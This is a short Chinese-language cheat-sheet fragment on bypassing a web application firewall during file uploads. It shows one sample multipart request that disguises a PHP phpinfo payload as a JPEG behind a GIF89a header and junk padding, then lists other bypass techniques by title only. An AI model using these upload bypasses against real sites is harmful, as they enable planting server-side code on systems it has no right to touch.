WAF 绕过
绕过 WAF
1. 填充垃圾数据绕过
Content-Type: image/jpeg
a=11111111111111111111111111111111111111111111111111111111
GIF89a
<?php phpinfo(); ?>------WebKitFormBoundaryYijPw9QB0WlswSL2
Content-Disposition: form-data; name="file_x"; filename="bk.jpg"
Content-Type: image/jpeg
a=111111111111111111111111111111111111111111111111111111111111111111111
</php phpinfo(); ?>2. 文件扩展名回车绕过 (只支持 PHP)
3. filename 绕过
4. 修改 Content-Disposition 字段值的大小写绕过
5. 文件重命名绕过
6. 删除 Content-Disposition 值的 form-data 绕过
最后更新于